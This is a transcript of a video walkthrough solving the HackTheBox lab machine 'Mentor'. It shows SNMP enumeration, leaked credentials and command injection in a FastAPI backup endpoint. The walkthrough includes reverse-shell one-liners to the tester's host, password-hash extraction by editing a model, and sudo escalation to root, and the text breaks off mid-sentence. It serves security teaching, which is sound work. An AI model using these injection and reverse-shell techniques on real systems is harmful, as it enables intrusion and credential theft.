HackTheBox - Mentor

IppSec · Beginner · 🔧 Backend Engineering · 3y ago

Key Takeaways

Enumerates and exploits a FastAPI application in a HackTheBox challenge using nmap, ffuf, and authentication bypass techniques

Full Transcript

What's going on YouTube, this is IppSec. We're doing Mentor from Hack The Box, which is a relatively straightforward box as long as you value recon and take things slowly and have a good workflow. And I say that because there's a step early on in the box that if you skip, it's gonna just spin your wheels consistently, because you have to enumerate SNMP that's running on the box and then brute force the community string, and there's a trick to brute forcing the community string: a lot of the tools for some reason just fail. I don't know why, but like Hydra and onesixtyone won't find the internal community string; you have to use a tool called snmpbrute, at least that's the tool I use to find it. And if you don't do that, you'll find an API web page that's coded in FastAPI, but you can't do much without finding the SNMP info first. And then once you get a shell on the box, the next step is finding a password that's coded in the SNMP config file. I think it's part of like SNMPv3, but if you just run a lot of tools like LinPEAS, for some reason it doesn't detect that, so at the end of the video we'll go over LinPEAS and add it so we detect it in the future. With that being said, let's just jump in. As always we start off with nmap, so -sC for default scripts, -sV enumerate versions, -oA output all formats, put it in the nmap directory and call it mentor, then the IP address of 10.10.11.193. This can take some time to run so I've already ran it. Looking at the results we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80.
Its banner tells us it's Apache httpd version 2.4.52 and also that it is Ubuntu. It's also redirecting us to mentorquotes.htb, so if we went to the website 10.10.11.193 we get a 404 page because we don't have that in our hosts file, so let's add it there: sudo vi /etc/hosts and then 10.10.11.193 mentorquotes.htb. So now when we refresh the page we get to a page that just has a bunch of quotes. So the very first thing I want to do is look at the header. We could use curl but Burp Suite is a bit quicker; let's make sure intercept is on, then send it, go over to, well, I meant to go to the Repeater tab, and we can look at it and we see it's Werkzeug and Python, so we know this is going to be a Python application. It's probably going to be Flask; we could verify it by just getting like a 404 page, so if we go to like /doesnotexist we see this error message. If you Google error messages, generally they tell you something even if it looks generic, and we see bunches of Flask, so we know this is going to be a Flask web server. There's no point in like doing the extension PHP when we look for things, so I'm going to set up a gobuster to enumerate this: gobuster dir -u http://mentorquotes.htb, wordlist /opt/SecLists/Discovery/Web-Content/raft-small-words.txt. I guess we should store an output file, so root.out. And as that runs we can also do some virtual host enumeration because it has directed us to a DNS name, so I'm going to do ffuf. We could also use gobuster; I've been a bigger fan of ffuf lately for this type of enumeration. So mentorquotes.htb, add the host header, so -H Host: FUZZ.mentorquotes.htb, and the wordlist /opt/SecLists/Discovery/DNS, and we'll do subdomains-top1million-20000, sure. So I'm gonna hide everything with 18 words, so we do -fw 18, and then the other thing we really need to do, I wish it was default on ffuf, is -mc to match all error codes, so I'm gonna do -mc all. And right off the bat we get a 404 error code
on api, so I'm going to add that to my hosts file: sudo vi /etc/hosts, and then we can add api.mentorquotes.htb, save it and take a look at it. So api. and we get this one page. I'm gonna guess this is FastAPI right off the bat, just based upon it returning the JSON like that. If we put that in our Host header we can see the server is uvicorn, I don't know how to pronounce that, but it is just returning JSON, a very common thing with FastAPI. Actually let's just Google this thing. I'm gonna go to Google, turn Burp Suite off; if I Google this response what happens? Django, we have one FastAPI post, but this is definitely FastAPI, and FastAPI does have a /docs, right, so I just know that from playing with the framework, and going to /docs gives us this Swagger page. Glancing at it, it doesn't look like any of these endpoints require authentication because we don't see the lock next to their name; however when we click on it we do see the authorization is required. Clicking execute, we can put something here, and then going in it says it requires the header Authorization, so authentication is required; FastAPI just isn't configured with authentication in mind. It is one of my big pet peeves because I really like seeing the locks next to each endpoint, because number one, the lack of authentication on some API endpoints is a common finding, so making it visual lessens that chance. Also you know authentication is being done uniformly across all of your endpoints when you have a visual representation, so we'd have to click on each one of these and make sure and test just because it's not coded the right way. We'll look at it at the end of the video to see exactly how to do that, but all these endpoints require authentication except the signup. So let's try out this endpoint: we can sign up with our email, we can do like root@ipsec.rocks, and then a username of, we'll do ipsec, and then a password of, we'll do password, right, and then we click execute and we can see
user ID 4 is created. So now when I go over to the login endpoint we can do try it out, log in with the same email, username of ipsec, password of password, and then click execute; we can see it gives us a JWT back. I'm saying JWT because I see three base64 strings. If we look at this one, echo -n, base64 -d, the JWT is username ipsec, email root@ipsec.rocks, so username and email's in this. I'm going to copy this real quick and then we can go to the users endpoint now that we have a user account, paste this in, click execute, and it wants the header again. So maybe I need to do Authorization like this, click execute, it's not working. Let's send it over to Burp Suite to see exactly how this is looking, so I'm going to click execute and we see the actual page isn't adding it at all, and I'm pretty sure if we did the proper way then there would be a way to add this Authorization header to everything. I want to say we need to add Bearer, maybe not, does that work? No, so sometimes with JWTs you add Bearer, sometimes not. So here we can see only admins can access this resource. I'm going to do /1 to see if we can even get like user information; we're user ID 4, we still can't get it. And I know I think rainy day had like 4.0 to put a float here and did something, and if we do that here, only admins can access the resource, so can't really get any details out of this. We could look at the quotes endpoint, so now that we have this we can just edit a request; I'm going to put this to be users, this can be quotes. If we get quotes it returns all the quotes that we saw on the first page; if we do 1 we get this one; if we do a float we get "value is not a valid integer". So this is a Pydantic thing most likely, just because FastAPI generally uses Pydantic for handling inputs and outputs, and all that does is like a strict typing thing so you can't give it unexpected input or it doesn't give you unexpected output. It's a really nice thing that we'll probably dig into in a little bit, so
let's look at what else is in the quotes. If we do a POST we can create a quote, so let's do POST and just hit the quotes endpoint: only admins can access it. Let's see, we could do a PUT, probably going to say only admins, right? Method not allowed, so we need to do PUT on quotes/1: only admins. And DELETE, I'm guessing only admins as well, right? Yes. So I don't know exactly what we could do; I was gonna say we could try like SQL injection here, right, but again the Pydantic is going to stop us from sending anything but an integer to this field, so nothing we can really do. So we have to go back and think of what recon; maybe this API isn't showing us all the endpoints, so one thing we could do is a fuzz. So I'm going to copy this to a request, so copy to file, I'm going to make this api.request, save it, and we'll vi api.request, and I'm going to do a fuzz here, and we can do ffuf -request api.request -request-proto http, wordlist /opt/SecLists/Discovery/Web-Content, is there API here? Let's see, let's just save this and then find, grep -i api, so Web-Content api and lowercase, okay, common paths, sure, -mc all, and let's see, status 404, let's filter words too, and we don't get anything here. Let's see, instead of common paths what else is there? We can do actions lowercase, and we see there is a /admin. And the main reason I used ffuf here instead of gobuster is just because I could paste in the raw request and don't have to worry about the Authorization header. I know I could have done it with the flag in gobuster but I like passing the request like you saw me just do. So if I get /admin we can see exactly what this looks like: only admin users can access this. So we have to figure out how to get to an admin, and if I went back to this we see James mentioned twice; we have an email for James but we don't have his password. We could try logging in and just guessing it, right, so if we try it out and do james@mentorquotes.htb, I think it was,
and then James, we could try logging in. We probably should disable Burp Suite, and we get not authorized. So we could do like ' or 1=1 and try SQL injection here, but it's probably super unlikely, and we don't get it as well. So at this point I'd run out of things to think of, and maybe there's another service I'm just missing, right, so do sudo nmap -p- -v to show open ports as we find them, -oA nmap/allports 10.10.11.193. And then we can also, let's see, let's clean this pane up, so the bottom one is that nmap, we could do a second nmap: sudo nmap -sU to do UDP, -oA nmap/, we'll call this udp, 10.10.11.193, and again -v to see open ports as it finds them. So we can see how long nmap sometimes can take, and this is why I always say have recon running in the background, because you can't hack time. This one took around three minutes and 25 seconds, and we still have this nmap going on, and we haven't found the port that we need on this UDP scan. So it's always something you should do as a habit, just in the background. We're gonna keep it running; hopefully it finds it and did not miss it because we had an nmap running while we did this port scan. Okay, so it's been almost 20 whole minutes and nmap has finished for the UDP, and what's more frustrating is the port I was expecting to see, SNMP, is not on this list. And when it was running I always thought about canceling and restarting it because I had an idea what went on when I saw all these error messages above, but I decided to let it play through just so we can use this as a learning experience, because if you're doing too many things at once, especially with UDP scans, you'll get mixed results and things like that. So I'm just going to run it now that I don't have a second nmap running, and we're gonna see if it finds the SNMP port and how long this takes. So we see it's still doing a few errors, and that's just because of the VPN, and maybe it's going to do all the same ones. I did not
actually expect to see that, so it went four, five, six, seven, eight, so we still have that send delay going on. So let's see if it ends up finding SNMP this second time; still, it's probably going to take about 20 minutes to run, but hopefully it finds SNMP this time. So I'm just going to let it run, pause the video again, and we'll see what happens. And we finally have UDP 161 reported open. I'm going to let nmap finish just to see how long it takes, see if it's still like 20 minutes, and then we're going to run nmap one more time just to make sure it discovers 161 two times in a row when we're not doing anything in the background. So here we have the output of the second nmap; we see it's 1008 seconds. I think the other one was like 1100, looking at it, yeah, we see 1100 here, but we do have 161 open. I'm going to run it one last time and we're going to see how long it takes and if 161 is open; I'm assuming it will be, but honestly I don't know. And this probably would go faster if I was connected to a US VPN server, because I am in the US but I'm currently connected on a European one, so the latency is a bit higher, so my UDP nmap will go slower. So let's just hope 161 does show up. Okay, so I'm not exactly sure what happened here, but our nmap shows a lot of UDP filtered ports; that being said there is just one open and that is going to be SNMP. So after doing the video and talking to 0xdf, he reminded me of one super handy flag when doing nmap, and that is the --min-rate flag. So I'm going to set the min rate to 10000 and then just do 10.10.11.193, and we can see UDP reliably discovers 161 even at this high rate, and it only takes one second to run. So this definitely does come in pretty handy if you want to detect SNMP on future boxes. When doing the min rate this high, just be careful, because like all these closed ports, it's not reliably going to be the same ones, and I think that's just because you're flooding the packets. If you look at it on a network capture you'll see that even
though you send like a UDP request to 2148, the server will respond with an ICMP back saying the destination is not reachable if that port isn't open, sometimes, and I think when you do this many packets at once it can't send all those responses back to you and you miss some. So, yeah, so hopefully you enjoy the min rate piece; let's get back to doing the box. So the path through this box is most likely SNMP, so let's do an snmpwalk against it: snmpwalk -v2c, which is the default version that you normally use, -c public, that's the default community string, and then 10.10.11, I think it was 193, yep, and we start getting things. I saw an admin@mentorquotes.htb; this I think is a default thing, but there isn't any good information in SNMP. However there is a possibility there's a second community string configured, so I'm going to go and download snmpbrute, which is just a good brute forcing script for this. Let's see, Python, GitHub, there we go, and then let's just clone this to our box, so git clone, copy it, and then we can do python3 snmpbrute.py to see the options there are, and there's quite a bit. Let's see, we want -t the IP and -f the dictionary, so I'm going to do a find on SecLists to find a good wordlist first. I'm just going to grep -i snmp and we have this one, so I think any of these would work. Let's see, wc -l, we can see how big each of these files are; 118 lines, that's a good one for a first bet. So let's do python and then it was -t the IP, so 10.10.11.193, and then I think just the community string or the dictionary with -f for a file. I guess we run this and we see there is version 1 public, version 2 public, and version 2 internal, so we do have an internal one. And you could do -b for brute so it doesn't ask you for enumeration; generally I don't like using these SNMP tools to do enumeration, I just use snmpwalk. Before moving on I just wanted to show some other SNMP tools and show it just didn't work, so
if you use these tools in your current setup I would definitely switch out for snmpbrute, right. So we do onesixtyone, which I think is the tool I used a long time ago in the last box that required SNMP. Let's see, what is -h, so we need -i for the IP, 10.10.11.193. Oh, it wants it to be a file, so we can trick this with this little bash trick, so now it runs this command and treats it as a file when you do it with this less-than and parenthesis. But we do see it comes back twice with public; it doesn't pick up the internal, which is odd. If we grep internal on the wordlist we see it's there; if we grep public on the wordlist, we have "all public". I don't know, let me try one thing real quick: sudo vi, "all public", I'm going to delete that from it, we're going to run it again. So it looks like it's just treating the "all public" as public for some reason; it doesn't pick up on internal, which I just can't understand why. So onesixtyone failed. We also have Hydra, so you can do like hydra -P /opt/SecLists/Discovery/SNMP/common-snmp-community-strings.txt and then -v the IP and then snmp, and it will quickly resolve public, but it never will discover internal. I think it takes about like 10 minutes to run; for some reason Hydra is slow in this sense, so I'm just going to pause the video, we'll come back to it and show it did not detect internal. It finished a bit quicker than I expected, only taking I think one minute; however Hydra only detected public. So both Hydra and onesixtyone fail to detect the internal community string for this box, so definitely use snmpbrute. But with that being said, let's get back to the box. So if I do go back up here, we do snmpwalk and put internal here, it's going to dump a lot of information. Now this one can take a while; I'm gonna do time against this, and then we're gonna do an snmpbulkwalk as well, and we're going to see the difference on the two. So let's do, if I just paste this, I think bulkwalk has the same arguments; it does, sweet. So let's do time
against that and we'll call this bulk.out, and I'll use tee so I can see the output as it comes. Let's copy, here we go, tee bulkwalk.out, and then we can just do a time here. It's going to give me the same exact information, I just want to see the time, so I'm going to pause the video, let both of these finish, and we're going to see how long they take. So the regular snmpwalk took about 13 minutes and snmpbulkwalk took around one minute, so it's definitely faster to use bulkwalk when dumping the entire MIB. And we see a lot more information than we had seen when we just looked at the public community string, right; this is showing like all installed software. Right now we have a list of packages here; there's also going to be the actual programs and arguments that are running, so let's just take a look at this type of area. So I'm going to do a less against the file and then search for hrSWRunPath, and we can see everything here. I want to say the 362, these are PIDs, I may be wrong there, but we do see it jumping, so I know it's not incremental; almost positive it is a PID. And this isn't showing the arguments, but there is another one that will show arguments. For instance, we see just this one Python thing running here; there's a Python thing running here as well. If we looked at 2123, let's grep that real quick, so I'm going to grep 21, I actually have to go in snmpbrute, well no, we're here, bulkwalk.out, okay, so grep, what'd I say, 2123, right here, yep, 2123 on bulkwalk.out, and we can see everything related to this. So I'm guessing this is just telling us the PID here is, the path, like the program that python is running; we have the path to python. This is probably going to be the cmdline if you looked in like /proc, and we see login.py and some credential and then nothing else, right. So this is probably going to be a password to something just because it's being passed to login.py, and this is one of those reasons why
any type of hardening thing will tell you never to put passwords as arguments, just because it gets leaked when you do processes, so like ps -ef and things like that. So let's grep on 2050, let's just see something else and then we'll move on, right. So 2050, we can see this one is python, this is doing some multiprocessing semaphore tracker. I want to say this is the FastAPI, let's see, what did we just do, let's try 1916, I don't think I checked that. I was trying to find the FastAPI server but it's going to be one of these; here we go, uvicorn, so this is most likely FastAPI. We can also see the --reload, which means the web server will automatically load new code if you manage to write to a file on it, and so it behaves kind of like PHP in that aspect, where if you write to a PHP file then call it again it gets executed. If this reload wasn't in this, then if we wrote to a Python file it wouldn't take effect until python itself is restarted. So this is just monitoring all file writes to the Python scripts within the directory, and if they change it reloads the server, right. But we have this password to login.py, and if we go back to Mentor we did have an email username, so I'm going to put that password in for this, and then when I click execute we get a session ID, and before we were getting like invalid user or something. So now we have a way to access admin endpoints, right, so if I went to users and we run this again, let's see, path ID, oh, not a valid integer, so we put this, user not found. We can dump a list of users if we do it with no arguments; we get 1, 2, it's odd that, let's see, 3, 4, so user not found. I wonder what my user ID is, unless my user got deleted that I created in the box, so we'll have to look at the code there to see exactly what this endpoint is doing that I don't see the user I created. But we have two usernames, james and svc; we could try logging into svc but it's not going to work, I just knew that from the power of hindsight. So let us check
that admin endpoint. Remember there's this endpoint at /admin that only admin can access, and if we try to, we can see there's a /check and /backup now. So if I enter /check we get not implemented yet, so let's do /backup and we get method not allowed. So if we do a, let's try OPTIONS, not allowed; let's try POST, there we go. So now we have an Unprocessable Entity error; it requires a body, so since this is FastAPI I'm just going to put JSON, and I don't know any fields, so I'm just opening and closing curly brackets. So we put something in the body and it tells us now path is required, so if I do path and then /etc/passwd and then I guess end it with a comma, let's see, I screwed something up here. Okay, so it doesn't want to be ended with a comma for some reason; I guess that's just how it expects JSON. I bet if we had multiple variables then you'd put commas in, but the last one does not. And we just get info done when we run this, so we can try something with, it doesn't exist, we still get done. We could try hitting check and we get method not allowed; let's change it to a GET, not implemented yet. So we don't know exactly what this backup is doing; we could test it for like command injection, so we could try /etc/passwd and then sleep 1 and see if this request takes one second. It does not. We can also try a ping, so I'm going to test ping against myself, because I always get these flags mixed up, if it's -c or -n; it is -c 1. So let's do a sudo tcpdump -i tun0 icmp -n to disable DNS, and I'm probably going to add a -v as well, and then try ping -c 1 10.10.14.8,
and I'm going to end it with a semicolon as well just in case it adds something to the path. It takes 200 milliseconds and we get a ping. I'm going to try sleep 1 again real quick because the time does go up when we use ping like this, and maybe it was this semicolon that I screwed up with, and that was it. So what's happening here is it must be putting something after the path, and when we don't have the semicolon it creates invalid syntax, so it just automatically ends it. So since this is a backup feature, maybe it's doing tar, and it's doing like tar, let's go over here, maybe it's doing tar -cjvf backup.tar.bz2 and then taking user input here and backing up another file. Let's add this: it's adding something at the end after user input, I don't know what it is, but when I just put sleep 2 here like this, it appended /etc/passwd after this, which caused my script to error because this is an invalid command. When I ended the sleep 2 with a semicolon then it executes just this, and that's why it worked, right. So now we have some type of blind execution; we can try like a reverse shell now, so I can do bash -i >& /dev/tcp/10.10.14.8/9001 0>&1 like that, and again make sure we have that semicolon at the end, URL encode it for good measure, nc -lvnp 9001, send it, and we just get done. We can try putting bash -c before this just in case this is not being executed in bash, and then we run it again; still don't have a shell. So I'm going to guess we may be in some type of Docker, or bash just doesn't have for some reason like the network thing like we did with the /dev/tcp. So I'm gonna get a Python reverse shell, because we know this box has Python because it is FastAPI. So I'm just going to do revshells.net I think it is, or let's see, Google revshells, let's see if this comes up real quick, revshells.com, and I'm going to search for Python, let's just do python1, put our IP in, and then copy and paste this. So paste this, and we can say python, oh, it's already doing python here, so when we
send this we get some type of errors, and that's because of quotes, so we have to escape every single quote. Does this have anything we could try, URL encode, let's see what happens with this. I'm actually not sure; I know escaping the quotes will work, but maybe URL encoding does as well. Does not, or I screwed something up, so let's just escape the quotes. So get rid of that, get rid of that, let's see what else, is there a quote where our host and our port is, okay, oh, sh as well. So now we have escaped all the double quotes, so this should be valid JSON, and then we run it and we don't get a response here, which is a good sign because we have a shell. So python3 -c 'import pty; pty.spawn("/bin/sh")', and I'm doing /bin/sh because I'm not positive bash exists yet. So that's done, stty raw -echo; fg, enter twice, and now we have a good shell here. So we could look for like bash to see if it exists, and it doesn't look like it does, so that's why a previous reverse shell did not work. But the very first thing I always do when I get a shell somewhere is try to get credentials out of the web app, and if we look at this Dockerfile we don't see any credentials exposed. Oddly enough it is exporting /home/svc/.local/bin to PATH, so I'm guessing that's where the app exists. So let's see, there is a config.py; if we look at it we don't get anything. There is db.py and we have it running postgres, and it's going postgres against 172.22.0.1, which I'm going to guess is probably the host. Let's see, ip addr, see I'm in 172.22.0.3, so postgres is probably going to be on the host system. Let's see what else is there, do we see postgres credentials? That's database user, metadata, email, password, database. Let's see, grep -Ri password, does this not have recursive grep on it? It does not look like it does, so I'm going to do an ls -la to see if there's like a .env file; I do not see one. Let's go back in db.py, oh, the credentials, sometimes default credentials I guess just hide in plain sight. So the credentials
are postgres postgres to this box. We could like upload chisel to this box and port forward and access it and then get a shell that way; we'll do that probably at the end of the video. The way I generally do this if I'm like in a rush or I can't get a reverse shell, since we know the reload is on this box, where is it, right here, we can just edit the file. So this is a FastAPI, and if we go into the API directory we can see all the files. So if I look at users, this is going to be the user endpoint, so if we just get user ID we can see it's doing a response_model, and this is going to be the Pydantic piece. And if we look at this it's doing users equal to await; this is going to be some asyncio thing so we can run multiple tasks at the same time, it doesn't really matter here. And it's doing a crud.get_user, and CRUD is just a terminology mainly used for database, like create, I forget what it stands for, create, R is something, update, delete, so, or it's probably some way to, create, replace, update, delete is what CRUD I would guess. But if we look at crud.py, the main thing I'm showing here is we don't have anything filtering the password out, right, and if we look here for a get_user it's just doing a users.select and returning a fetch_all off the database, so there's nothing here that's also filtering the user. So what is filtering the user when we get an ID is the response model; it's UserDB. So if we look at the models, and this is going to be the Pydantic code, we don't have them, so we can do vi, we can see the base model is just id, email, username. The database is probably returning everything, but Pydantic is saying return this JSON blob with only these variables. We know the password is in the user schema, so if we add password to the UserDB model of Pydantic, we can do password here, and I used yank, like yy and then p for put, and I did that because I don't know if this is tabs or spaces. It's always safer when you're editing code in Vim on a target to copy and put
lines down just so you get all the spacing correct, because if I use tab here and it was using spaces the code would crash, right, so it's just a safety thing. So I'm going to write this file, and now if I go back to the users, right, and then we run this, it's not working. Did I crash the server, or maybe this isn't multi-threaded, so maybe the service hung while I have this reverse shell. We don't see it working; exit, okay, now we get it, and we don't have, there we go, now we have the server reloaded. So the server wasn't reloading until I exited this shell, and then once I did it reloaded, and we see the user model now has password in it, so when we get a user we can get the hashes as well. What's going on, it's me from the future again, and I wanted to highlight this whole thing of the web server hanging, because it is somewhat a common issue when attacking servers that are in development that don't have something proper like nginx or Apache in front of it that do threading. So let's just show this real quick: we run this command, we get a shell, and nothing responds to us until this shell dies. And the whole reason that happens is, if we look at ps -ef, grep on, let's just do app, we can see this is the command that's running and it's just got two workers assigned to it. I'm pretty sure if we up this to three workers then it would work in the background; I think one worker is just the master, and then anyone that we connect is another one, so when you hang the one thread there's really no more threads left to accept users, and that's why we're in this state, right. So if I just have this path to be just /etc/passwd again, it's not coming back to us; the web server opens the connection because we're part of that master worker, but when it tries to fork us over into the other thread it just can't because it doesn't have the workers available. So we could fix that, but before I do I want to show, if you didn't get a proper PTY and Ctrl-C out of this session, it still hangs on the server
and it becomes a royal pain, right, and many people had to revert the box when this type of thing happened. Thankfully I'm from the future and have a root shell here, so we can just do ps -ef, grep on python, see this shell is still running here, it's probably this command right here, so I can just do a kill -9 on this, and now this comes back to us. So the easiest way is just to run a command called nohup; I'm guessing it's on the container, but we can just do nohup and then leave this command and we put an ampersand at the end. So if I do nc -lvnp, run it, and we did not get a shell. So the best way to troubleshoot this is let's just run it locally, right, so I'm going to take this Python shell, actually first I'm going to run it on my machine. Unexpected, oh, because we have all the escapes, right, let's see, we probably want to export this as well. So I'm going to get rid of the nohup, this is how we have it, so I'm going to run this; we had a semicolon at the end, and we'll have to get rid of the escapes because we were doing that because it was in JSON. Since we're just running it natively, again get rid of those, and then one more on sh. So we have the shell, and we can see my terminal down here does hang, so we can exit that, and we want to play with nohup, right. So if I do nohup python like this, I don't have the ampersand at the end so it's not going to background, so that works. Now let's put the ampersand here and we get an invalid command, because there's the semicolon at the end, and remember we have the semicolon here because the actual server is appending data and we use the semicolon to ignore everything afterwards, right. Looks like we can't use the ampersand and a semicolon. That being said, comments will also ignore everything; when we do SQL injection we do the dash dash space, that's a comment, because we want to ignore what the server adds to it, and in bash it's that little hashtag, and that works. So now let us move over to the server and we're going to
put a nohup back in and then go to the very end, get rid of the semicolon, and I'm going to put that ampersand in, and because this is an HTML or whatever special character I'm going to press Ctrl+U to URL encode it. And if we just send this we get "info: done", so the server responded to us and we have our shell. So I can go to this pane and the server is still working and we have our shell, it's happily backgrounded, so, um, now we don't cause an outage when we're playing with this, right? So we can do PTY, or python -c 'import pty; pty.spawn("/bin/sh")', stty raw -echo, fg, and then I'm going to just do a ps -ef, or, let's see, I guess we can do it on this host, I just want to see what my reverse shell looks like. Um, I don't even know if I see the nohup. That's me, right? Let's see, nohup, I don't think nohup is even showing up in ps, which is pretty cool. Um, but all the nohup command does is, I bet if we man nohup it'll explain it better than I could: uh, "run a command immune to hangups, with output to a non-tty". So I think it's just habit, I always run nohup when I do these things. You could probably just do the, um, ampersand at the end, but I think if you do that and something kills the thread it won't background itself and, um, it'll die as well. I just know nohup makes things much more stable for me. So hopefully you enjoyed this little snippet. So I'm gonna go back and edit in a few other things I want to add in this video. Um, we probably already know James's password because that's the user we logged in as, so we have this one credential, we want to get this one hash. Um, we can just go to like CrackStation and put this in, and if it doesn't crack right away then we can go to something like, um, hashcat and crack it, but CrackStation is generally my first bet when it's just a hash and not like a bcrypt. Um, it is somewhat annoying because you do get these captchas, but then once we crack we can see the password is one two three something, I have no clue what that is, but we now have the password
to svc, so I can do ssh svc@10.10.11.193, put in the password, and I get logged into the box as the service account. And when I was doing the box for the first time I spent a lot of time trying to privesc, because this one is not obvious: it's in a file, but LinPEAS itself won't tell you, uh, the string, and at the end of the video we'll probably modify LinPEAS to add it so I never waste that much time on this step again. But I kind of want to take all the steps I looked at before running LinPEAS to see what is going on. I start off with running a ps -ef and I can probably search for root so root stands out a bit more, but this is just like looking for various things that are exploitable, right? And the main thing I see first is, well, this is us, right, we SSHed into the box; we have Apache here; we have three different Dockers running, which I didn't know, we experienced the one here, this is the login script that we saw before; and right now I see Postgres. Um, I thought Postgres was running on the host because it was 172.22.0.1, but it looks like there's some routing to put Postgres into a database. So the very first thing I would have tried if I did not run this ps command is going back on the container, trying to chisel my way into Postgres and, um, get a shell that way, because Postgres does allow you to run commands, but I'm just going to be put into a different Docker container, so it's not nearly as interesting to me now that I see that, right? We also have the FastAPI server running in a container as well, and I'm guessing maybe async didn't clean things up, because we see a lot of defunct processes. I bet if I ran another sleep, uh, we'd see another one go defunct, so there's definitely a bug in the web server not cleaning itself up, and it is also running, um, in a container, I think I said that. We have this one, this is just executing main.py, maybe this is just the initial web page that we accessed. We haven't got access to this, so maybe we want to look into this one and get a password from that
container, but, um, it's not really that interesting to me. We could try to find what main.py is by just doing a find / -name, and we can hide all errors, and we can see, maybe this is it, let's see, python3, let's see what this is. I don't think this is it. Um, maybe, maybe after we root the box we can go in that container and see what it is. Let's see, /home/svc/.local. If we go back to the page, mentorquotes, let's see if we can find the file real quick. Um, "your daily motivation", that's probably a unique string, so grep -r "your daily motivation" on this, and I don't see anything here. We could change it up by doing like /var, and we probably want to send standard error to /dev/null. Don't see anything on that. Maybe /home, and let's see, maybe /usr will be the last one we check, but I want to say if it was in a Docker and we had read access to it, it would be in /var, but I don't see it there. I'm guessing we don't have access to where the web server is hosted. Also, if this was like /var/www/html, uh, we'd find it just because of it existing, right? I'm going to cancel that grep because it looks like it's going to take a long time, and we could also, I guess, curl 172.20.0.1 on port 8000; we get "detail: not found". If we do localhost on port 80 it gets moved to mentorquotes, and I'm guessing that's /var/www/html, right? See, this is not it, right, no, that's the Apache2 default page. So maybe in the Apache config we want to look, so sites-enabled, let's look at the default, and we have mentorquotes and it's going to 172.22.0.1 port 81.
So we know that, um, this website is in a Docker container and I don't think we have read access to it, so we can't really just get credentials out of that or see what it's talking to. It's probably talking to the Postgres server. So at this point I'd probably start looking at forensics. So I see this user was probably created around June 7th. The next step is to look at when the box was created, and I always like seeing the SSH key of the SSH service, because this rarely gets regenerated, so it's a good idea of when it was created: so June 3rd. You can't really just take random packages, because we see ssh_config, this was February 25th, it's actually before this, and the reason why is, um, it was created as part of the apt package, a .deb package, and it kept that file timestamp. SSH keys are generated upon, like, install, so that's why that date is different. If we run a stat against these, so let's do stat on /etc/ssh/ssh_config, and we'll do the host key as well, so host, let's just do the DSA key. We can see, um, everything is June 3rd, and for ssh_config we see this is February 27th, February 25th, June 3rd, and the birth is June 3rd. So ls isn't showing the birthday. This is when the file was created; change is when like metadata, permissions, was modified; modify is when the file was actually modified; and access is supposed to be the last time the file was accessed, but I don't know if that like actually works well, right, because if we do a cat against this and then we do a stat against the same file, the access date doesn't update. But the ls command, what was it showing? We do ls -la /etc/ssh, it is showing February 25th, so the date it was last modified, and again this comes out of the .deb package. Also, if you look like at ippsec.rocks for timestamps and stuff, you'll notice I talk a lot about this, which is the in-depth timestamp, like the milliseconds it was created, and since it's all zero that's another indicator it was not user created. If we look at it on this, so we do find, or not find, stat this, we can see all
these timestamps are, um, granular. So, long way of saying we should look at timestamps. Um, I'm going to look at June 4th to like June 14th because, uh, June 3rd is when the box was created, so June 4th is probably when customizations would happen, and June 14th is like a week after, right? So we'll do a find on, let's just look at /etc to see system services that have changed, and then I can do a -type f for all files, and then -newermt for newer modified time, and we'll do year 2022 June, which would be 06-04, and then we also want to say a not, so exclamation point, -newermt 2022-06-14. I'm going to go back to the beginning of this and do a -ls so we can see permissions and all that type of stuff, and then 2>/dev/null, and let's just do -ls to put it all on one line, and this is showing every file, so maybe I want to do the -ls at the end. I always get these flags kind of mixed up. There we go, that looks better. Um, so when I put -ls up here it was printing out all the files and then doing this, which is meaningless, so I wanted to put the print part on the very tail end. Um, find arguments are very particular, I guess I should say. So we see /etc/sudoers is modified, that's something we haven't tested, is if we can run sudo on this box. I think we also have the SNMP, and that's really about it. So I'm going to look at the SNMP, so if we do a less on /etc/snmp/snmpd.conf, it is a relatively big file. A lot of the default things begin with a comment, so what I'm going to do is a grep -v to exclude, and then say everything that begins with a comment, exclude it, and then I'm gonna do a grep period to grep every line that begins with a character. And we can see the SNMP config, and one odd thing we see is this createUser bootstrap, and it has "secure password one two three underscore underscore". If we look at /etc/passwd and then let's grep for everything that ends in sh, we can see we are the service user, we have root, and there is James. If we su to James and put that password in, we can log in
and then we look at sudo, and James can run, uh, /bin/sh as root, so we can just do sudo /bin/sh and now we are root. So let's take a step back, because LinPEAS really should be able to find this. I'm guessing, let's see, I'm not like an expert on SNMP or anything, I didn't do that much research into this, but I know SNMPv3 has its concept of users, so I'm guessing this is the start of an SNMPv3 config and they just don't fully configure it. Um, we can see, where is internal, um, crap, and com2sec, so this is, uh, let's see, com2sec default internal, so this is why we can see the processes on v2c as the internal community string, because of this line. But I think v3, the createUser is part of that. I may be wrong there, but we do have a credential, right? So let's run LinPEAS just to confirm this credential doesn't exist, and I waited till the end of the video to do this because I want to be able to search this string, a super secure password, right? So I'm going to go /dev/shm, let's download the very latest LinPEAS. So LinPEAS GitHub, go here, go to releases, and download. So we can download linpeas.sh, we should download on our box, wget, python a web server, and we can curl 10.10.14.8:8000/linpeas.sh, and we'll pipe the output into linpeas.out. Um, we need to bash, and then we can, there we go. So I'm going to let this run and we're going to come back and see if LinPEAS tells us about this password, and when it doesn't tell us about the password we're going to modify the LinPEAS source code, rebuild it, and have a copy that will flag this in the future, so any machine that we run LinPEAS on that has SNMP, it'll be detected. So, okay, so LinPEAS is now done, let's get the password that we wanted, the super secure password, and then if we grep this on, um, let's see, linpeas.out, it doesn't get found. Uh, we could less, super, uh, LinPEAS, let's see, maybe Vim will be better, I guess we'll just, um, I wonder if cat shows it. Okay, that's better, so we can just do SNMP to back search and we can see it actually does have a
